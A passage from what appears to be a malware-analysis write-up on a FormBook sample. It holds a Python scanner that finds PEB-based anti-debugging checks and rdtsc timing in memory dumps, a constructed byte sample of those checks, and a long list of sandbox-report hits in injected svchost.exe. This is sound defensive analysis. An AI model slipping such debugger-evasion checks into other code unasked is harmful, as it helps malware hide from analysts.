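    b"\x64\xA1\x30\x00\x00\x00":     ("mov eax, dword ptr fs:[00000030h]", 0b000),
    b"\x64\x8B\x0D\x30\x00\x00\x00": ("mov ecx, dword ptr fs:[00000030h]", 0b001),
    b"\x64\x8B\x35\x30\x00\x00\x00": ("mov esi, dword ptr fs:[00000030h]", 0b110),
}
RDTSC = b"\x0F\x31"


def _peb_field_used(buf, start, rm, window=24):
    """Look a few bytes past a PEB read for the two classic follow-on loads made
    through the register that now holds the PEB: byte [reg+0x02] (BeingDebugged)
    or dword [reg+0x68] (NtGlobalFlag). Returns the field name or None."""
    chunk = buf[start:start + window]
    base = 0x40 | rm  # ModRM mod=01 ([reg+disp8]) with rm selecting the base register
    for i in range(len(chunk) - 3):
        # movzx r32, byte ptr [reg+2]  ->  0F B6 /r 02
        if (chunk[i] == 0x0F and chunk[i + 1] == 0xB6
                and (chunk[i + 2] & 0xC7) == base and chunk[i + 3] == 0x02):
            return "BeingDebugged"
        # mov r32, dword ptr [reg+68h]  ->  8B /r 68
        if chunk[i] == 0x8B and (chunk[i + 1] & 0xC7) == base and chunk[i + 2] == 0x68:
            return "NtGlobalFlag"
    return None


def _find_all(buf, pat):
    pos = buf.find(pat)
    while pos != -1:
        yield pos
        pos = buf.find(pat, pos + 1)


def scan(buf):
    """Every hit as (offset, mnemonic, peb_field), sorted by offset."""
    hits = []
    for pat, (mnemonic, rm) in PEB_READS.items():
        for pos in _find_all(buf, pat):
            hits.append((pos, mnemonic, _peb_field_used(buf, pos + len(pat), rm)))
    for pos in _find_all(buf, RDTSC):
        hits.append((pos, "rdtsc", None))
    return sorted(hits, key=lambda h: h[0])


def summarize(buf):
    """Per-mnemonic counts, the same shape as the report's repeated entries."""
    return Counter(mnemonic for _, mnemonic, _ in scan(buf))


# Constructed sample (not bytes from the analysed file): a BeingDebugged check via
# eax, an NtGlobalFlag check via ecx, an rdtsc pair, and a bare PEB read via esi.
SAMPLE = (
    b"\x55\x8B\xEC"                    # push ebp; mov ebp, esp
    + b"\x64\xA1\x30\x00\x00\x00"      # mov eax, dword ptr fs:[30h]
    + b"\x0F\xB6\x40\x02"              # movzx eax, byte ptr [eax+2]   PEB.BeingDebugged
    + b"\x85\xC0"                      # test eax, eax
    + b"\x75\x10"                      # jnz short +10h
    + b"\x64\x8B\x0D\x30\x00\x00\x00"  # mov ecx, dword ptr fs:[30h]
    + b"\x8B\x41\x68"                  # mov eax, dword ptr [ecx+68h]  PEB.NtGlobalFlag
    + b"\xA9\x70\x00\x00\x00"          # test eax, 70h  (heap-debug flags set under a debugger)
    + b"\x0F\x31"                      # rdtsc
    + b"\x8B\xF0"                      # mov esi, eax
    + b"\x0F\x31"                      # rdtsc
    + b"\x2B\xC6"                      # sub eax, esi
    + b"\x64\x8B\x35\x30\x00\x00\x00"  # mov esi, dword ptr fs:[30h]   no flag read follows
    + b"\x90" * 8                      # nop padding
    + b"\xC3"                          # ret
)

if __name__ == "__main__":
    for offset, mnemonic, field in scan(SAMPLE):
        print(f"{offset:08X} {mnemonic}" + (f"  -> PEB.{field}" if field else ""))
    print(dict(summarize(SAMPLE)))
```

Run it against a dumped memory region (the .sdmp files the report names) rather than the on-disk executable, since the FormBook stage that performs these checks only exists after injection into svchost.exe. A single fs:[30h] read is weak evidence on its own: compiler runtime code also reads the PEB (the loader data and process parameters live there), so it is the clustering the report shows, dozens of reads concentrated in the injected svchost.exe region next to the BlockInput, IsDebuggerPresent, DebugPort and rdtsc hits, that carries weight. The "Hyper-V RAW" strings listed in mobsync.exe, firefox.exe and WafZCahkNS.exe memory are the name of the Winsock Hyper-V socket provider that every Windows 10 and 11 build carries in its Winsock catalog, read when mswsock.dll is loaded; by themselves they show that the catalog was enumerated, not that the code compared it against a hypervisor list.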
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_01009360 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_0100A9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_0100AA40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h] (5x), mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035FA352 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D8350 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] (15x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352C310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03550310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h] (3x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h] (3x), mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h] (2x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035EC3CD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h] (6x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h] (4x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B63C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h] (3x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035663FF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h] (8x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h] (3x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h] (3x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0355438F mov eax, dword ptr fs:[00000030h] (2x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352A250 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03536259 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B8243 mov eax, dword ptr fs:[00000030h], mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h] (12x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h] (3x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352826B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352823B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h] (5x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h] (3x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h] (2x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h] (3x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035402A0 mov eax, dword ptr fs:[00000030h] (2x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h] (5x), mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352C156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035C8158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03536154 mov eax, dword ptr fs:[00000030h] (2x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h] (4x), mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035DA118 mov ecx, dword ptr fs:[00000030h], mov eax, dword ptr fs:[00000030h] (3x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035F0115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h] (6x), mov ecx, dword ptr fs:[00000030h] (4x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03560124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036061E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h] (4x), mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h] (2x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035601F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h] (4x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h] (3x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03570185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h] (2x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h] (2x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03532050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B6050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0355C073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h] (4x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B4000 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h] (8x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035C6030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352A020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352C020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B20DE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352C0F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035720F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035380E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B60E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0353208A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035F60B8 mov eax, dword ptr fs:[00000030h], mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035C80A8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03530750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035BE75D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572750 mov eax, dword ptr fs:[00000030h] (2x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B4755 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356674D mov esi, dword ptr fs:[00000030h], mov eax, dword ptr fs:[00000030h] (2x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03538770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h] (12x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03530710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03560710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356C700 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356273C mov eax, dword ptr fs:[00000030h] (2x), mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035AC730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h] (2x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0353C7C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B07C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035347FB mov eax, dword ptr fs:[00000030h] (2x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035527ED mov eax, dword ptr fs:[00000030h] (3x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035BE7E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D678E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035307AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0354C640 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03562674 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035F866E mov eax, dword ptr fs:[00000030h] (2x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h] (2x)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572619 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035AE609 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E627 mov eax, dword ptr fs:[00000030h]2_2_0354E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03566620 mov eax, dword ptr fs:[00000030h]2_2_03566620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568620 mov eax, dword ptr fs:[00000030h]2_2_03568620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353262C mov eax, dword ptr fs:[00000030h]2_2_0353262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0356A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A6C7 mov eax, dword ptr fs:[00000030h]2_2_0356A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]2_2_035B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]2_2_035B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]2_2_03534690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]2_2_03534690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035666B0 mov eax, dword ptr fs:[00000030h]2_2_035666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C6A6 mov eax, dword ptr fs:[00000030h]2_2_0356C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]2_2_03538550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]2_2_03538550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6500 mov eax, dword ptr fs:[00000030h]2_2_035C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035365D0 mov eax, dword ptr fs:[00000030h]2_2_035365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]2_2_0356A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]2_2_0356A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]2_2_0356E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]2_2_0356E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035325E0 mov eax, dword ptr fs:[00000030h]2_2_035325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]2_2_0356C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]2_2_0356C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E59C mov eax, dword ptr fs:[00000030h]2_2_0356E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532582 mov eax, dword ptr fs:[00000030h]2_2_03532582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532582 mov ecx, dword ptr fs:[00000030h]2_2_03532582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564588 mov eax, dword ptr fs:[00000030h]2_2_03564588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]2_2_035545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]2_2_035545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352645D mov eax, dword ptr fs:[00000030h]2_2_0352645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355245A mov eax, dword ptr fs:[00000030h]2_2_0355245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC460 mov ecx, dword ptr fs:[00000030h]2_2_035BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A430 mov eax, dword ptr fs:[00000030h]2_2_0356A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C427 mov eax, dword ptr fs:[00000030h]2_2_0352C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035304E5 mov ecx, dword ptr fs:[00000030h]2_2_035304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035644B0 mov ecx, dword ptr fs:[00000030h]2_2_035644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BA4B0 mov eax, dword ptr fs:[00000030h]2_2_035BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035364AB mov eax, dword ptr fs:[00000030h]2_2_035364AB
